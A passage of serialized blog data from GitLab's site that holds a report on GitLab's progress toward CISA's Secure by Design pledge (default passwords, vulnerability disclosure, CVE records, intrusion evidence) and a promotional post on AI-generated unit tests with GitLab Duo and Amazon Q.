shared in the near future.\n\n### Default passwords\n\n***Goal: Within one year of signing the pledge, demonstrate measurable progress towards reducing default passwords across the manufacturers’ products.***\n\nTo reduce the use of default passwords, GitLab uses randomly generated root passwords for its multiple installation methods. GitLab’s multi-method [installation instructions](https://docs.gitlab.com/ee/install/install_methods.html) also include guidance on how to change the randomly generated root password for each installation.\n\nFor some install methods, such as installing GitLab in a Docker container, the password file with the initial root password is deleted in the first container restart after 24 hours to help further harden the GitLab instance.\n\n### Reducing entire classes of vulnerabilities\n\n***Goal: Within one year of signing the pledge, demonstrate actions taken towards enabling a significant measurable reduction in the prevalence of one or more vulnerability classes across the manufacturer’s products.***\n\nGitLab has published [secure coding guidelines](https://docs.gitlab.com/ee/development/secure_coding_guidelines.html#sast-coverage) to its documentation site that contains descriptions and guidelines for addressing security vulnerabilities commonly identified in the GitLab codebase. \n\nThe guidelines are “intended to help developers identify potential security vulnerabilities early, with the goal of reducing the number of vulnerabilities released over time.” \n\nGitLab continues to improve its [SAST rule coverage](https://docs.gitlab.com/development/secure_coding_guidelines#sast-coverage) to address broader sets of security vulnerabilities for itself and its customers.\n\n### Security patches\n\n***Goal: Within one year of signing the pledge, demonstrate actions taken to measurably increase the installation of security patches by customers.***\n\nGitLab handles all updates related to its GitLab.com and GitLab Dedicated service offerings. Additionally, GitLab publishes a [maintenance policy](https://docs.gitlab.com/ee/policy/maintenance.html), which outlines its approach to releasing updates, backporting, upgrade recommendations and supporting documentation, etc.\n\nGitLab’s documentation has comprehensive guidance on [how to upgrade](https://docs.gitlab.com/ee/update/?tab=Self-compiled+%28source%29#upgrade-based-on-installation-method) self-managed instances based on their deployment model. This includes Omnibus, Helm chart, Docker and self-compiled GitLab installations.\n\nGitLab also provides a detailed [upgrade plan](https://docs.gitlab.com/ee/update/plan_your_upgrade.html) to ensure proper testing and troubleshooting can be performed as well as rollback plans if necessary.\n\nDepending on the version upgrade, specific changes ([example for GitLab 17](https://docs.gitlab.com/ee/update/versions/gitlab_17_changes.html)) for each version are highlighted to ensure a smooth upgrade process and limit unavailability of services.\n\n### Vulnerability disclosure policy\n\n***Goal: Within one year of signing the pledge, publish a vulnerability disclosure policy (VDP).***\n\nGitLab maintains a strong bug bounty program through [HackerOne](https://hackerone.com/gitlab?type=team), a [security.txt](https://gitlab.com/.well-known/security.txt) file highlighting GitLab’s preferred and additional disclosure processes, and [release posts](https://about.gitlab.com/releases/categories/releases/) highlighting security fixes.\n\nCustomers and the general public can subscribe to receive GitLab’s release posts directly in their email inbox.\n\n### Common vulnerability enumerations \n\n***Goal: Within one year of signing the pledge, demonstrate transparency in vulnerability reporting***\n\nGitLab includes the Common Weakness Enumeration (CWE) field in all Common vulnerability enumerations (CVE) records it publishes. Over the past year, GitLab has iterated to also include the Common Platform Enumeration (CPE) field in CVE records.\n\nThe GitLab [CVE assignments project](https://gitlab.com/gitlab-org/cves) stores a copy of all CVE identifiers assigned and published by GitLab in its role as a CVE Numbering Authority.\n\n> Check out [GitLab’s CVE submission template](https://gitlab.com/gitlab-org/cves/-/blob/master/.gitlab/issue_templates/Internal%20GitLab%20Submission.md?ref_type=heads).\n\n### Evidence of intrusions\n\n***Goal: Within one year of signing the pledge, demonstrate a measurable increase in the ability for customers to gather evidence of cybersecurity intrusions affecting the manufacturer’s products.***\n\nGitLab has published an [incident response guide](https://docs.gitlab.com/ee/security/responding_to_security_incidents.html) to help customers respond to incidents involving GitLab instances. Additionally, GitLab has open sourced versions of its [GUARD detection-as-code](https://about.gitlab.com/blog/unveiling-the-guard-framework-to-automate-security-detections-at-gitlab/) and TLDR threat detection frameworks. The repositories for those open source frameworks can be found on [GitLab’s Open Source Security Center](https://about.gitlab.com/security/open-source-resources/).\n\nIn a similar manner, GitLab is adding functionality to its [GitLab.com](http://gitLab.com) service offering to [detect compromised passwords](https://about.gitlab.com/blog/introducing-compromised-password-detection-for-gitlab-com/) for all logins using GitLab’s native username and password authentication method.\n\n## What's next\n\n[GitLab’s Security Division’s mission](https://gitlab.com/gitlab-com/gl-security) is to enable everyone to innovate and succeed on a safe, secure, and trusted DevSecOps platform.\n\nGitLab's security enhancements over the past year have allowed us to demonstrate our commitment to CISA’s Secure by Design Pledge, and they have strengthened our platform and given customers a more reliable and secure foundation to build on. \n\nOur commitment to iteration means we're already focused on the next set of innovations that will drive us forward.\n\n> To learn more about GitLab’s security enhancements, bookmark our [security page on the GitLab Blog](https://about.gitlab.com/blog/categories/security/).\n\n## Read more  \n- [Secure by Design principles meet DevSecOps innovation in GitLab 17](https://about.gitlab.com/blog/secure-by-design-principles-meet-devsecops-innovation-in-gitlab-17/)\n- [Happy birthday, Secure by Design!](https://about.gitlab.com/blog/happy-birthday-secure-by-design/)\n- [Strengthen your cybersecurity strategy with Secure by Design](https://about.gitlab.com/the-source/security/strengthen-your-cybersecurity-strategy-with-secure-by-design/)",[709,475,767,184],{"slug":1162,"featured":91,"template":789},"last-year-we-signed-the-secure-by-design-pledge-heres-our-progress",{"content":1164,"config":1167},{"title":817,"description":818,"authors":1165,"heroImage":821,"body":822,"date":823,"category":679,"tags":1166},[820],[675,767],{"featured":91,"template":789,"slug":826},[1169,1174,1179],{"content":1170,"config":1173},{"title":855,"description":856,"authors":1171,"heroImage":859,"date":860,"body":861,"category":691,"tags":1172},[858],[757],{"featured":6,"template":789,"slug":864},{"content":1175,"config":1178},{"title":1088,"description":1089,"authors":1176,"heroImage":1092,"date":1093,"body":1094,"category":757,"tags":1177},[1091],[1096],{"featured":6,"template":789,"externalUrl":1098,"slug":1099},{"config":1180,"content":1181},{"slug":829,"featured":91,"template":789},{"title":831,"description":832,"authors":1182,"heroImage":835,"date":836,"category":679,"tags":1183,"body":838},[834],[679,786,757,767],[1185,1190,1204],{"content":1186,"config":1189},{"title":841,"description":842,"authors":1187,"heroImage":845,"date":836,"body":846,"category":679,"tags":1188},[844],[675,848,786],{"featured":6,"template":789,"slug":850},{"content":1191,"config":1202},{"title":1192,"description":1193,"authors":1194,"heroImage":1196,"date":1197,"body":1198,"category":679,"tags":1199},"Enhance application quality with AI-powered test generation","Learn how GitLab Duo with Amazon Q improves the QA process by automatically generating comprehensive unit tests.",[1195],"Cesar Saavedra","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659604/Blog/Hero%20Images/Screenshot_2024-11-27_at_4.55.28_PM.png","2025-07-03","You know how critical application quality is to your customers and reputation. However, ensuring that quality through comprehensive testing can feel like an uphill battle. You're dealing with time-consuming manual processes, inconsistent test coverage across your team, and those pesky issues that somehow slip through the cracks. It's frustrating when your rating drops because quality assurance becomes a bottleneck rather than a safeguard.\n\nHere's where [GitLab Duo with Amazon Q ](https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/), which delivers agentic AI throughout the software development lifecycle for AWS customers, can help transform your QA process. This AI-powered capability can automatically generate comprehensive unit tests for your code, dramatically accelerating your quality assurance workflow. Instead of spending hours writing tests manually, you can let AI analyze your code and create tests that ensure optimal coverage and consistent quality across your entire application.\n\n## How GitLab Duo with Amazon Q works\n\nSo how does this work? Let's walk through the process together.\nWhen you're working on a new feature, you start by selecting the Java class you've added to your project through a merge request. You simply navigate to your merge request and click on the \"Changes\" tab to see the new code you've added.\n\nNext, you invoke Amazon Q by entering a quick action command. All you need to do is type `/q test` in the issue comment box. It's that simple – just a forward slash, the letter \"q\", and the word \"test\".\n\nOnce you hit enter, Amazon Q springs into action. It analyzes your selected code, understanding its structure, logic, and purpose. The AI examines your class methods, dependencies, and potential edge cases to determine what tests are needed.\n\nWithin moments, Amazon Q generates comprehensive unit test coverage for your new class. It creates tests that cover not just the happy path, but also edge cases and error conditions you might have overlooked. The generated tests follow your project's existing patterns and conventions, ensuring they integrate seamlessly with your codebase.\n\n## Why use GitLab Duo with Amazon Q?\n\nHere's the bottom line: You started with a critical challenge – maintaining high-quality applications while dealing with time constraints and inconsistent testing practices. GitLab Duo with Amazon Q addresses this by automating the test generation process, ensuring optimal code coverage and consistent testing standards. The result? Issues are detected before deployment, your applications maintain their quality, and you can develop software faster without sacrificing reliability.\n\nKey benefits of this feature:\n\n* Significantly reduces time spent writing unit tests\n* Ensures comprehensive test coverage across your codebase\n* Maintains consistent testing quality across all team members\n* Catches issues before they reach production\n* Accelerates your overall development velocity\n\nReady to see this game-changing feature in action? Watch how GitLab Duo with Amazon Q can transform your quality assurance process:\n\n\u003C!-- blank line -->\n\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/pxlYJVcHY28?si=MhIz6lnHxc6kFhlL\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line --> \n\n## Get started with GitLab Duo with Amazon Q today\n\nWant to learn more about GitLab Duo with Amazon Q? Visit the [GitLab and AWS partner page](https://about.gitlab.com/partners/technology-partners/aws/) for detailed information.\n\n## Agentic AI resources\n- [Agentic AI guides and resources](https://about.gitlab.com/blog/agentic-ai-guides-and-resources/)\n- [What is agentic AI?](https://about.gitlab.com/topics/agentic-ai/)\n- [GitLab Duo with Amazon Q: Agentic AI optimized for AWS generally available](https://about.gitlab.com/blog/2025/04/17/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/)\n- [GitLab Duo with Amazon Q documentation](https://docs.gitlab.com/user/duo_amazon_q/)",[675,757,1200,709,786,1201],"testing","AWS",{"featured":91,"template":789,"slug":1203},"enhance-application-quality-with-ai-powered-test-generation",{"content":1205,"config":1208},{"title":932,"description":933,"authors":1206,"heroImage":936,"date":937,"body":938,"category":713,"tags":1207},[935],[940,757,109,941],{"featured":6,"template":789,"slug":943},1752588144730]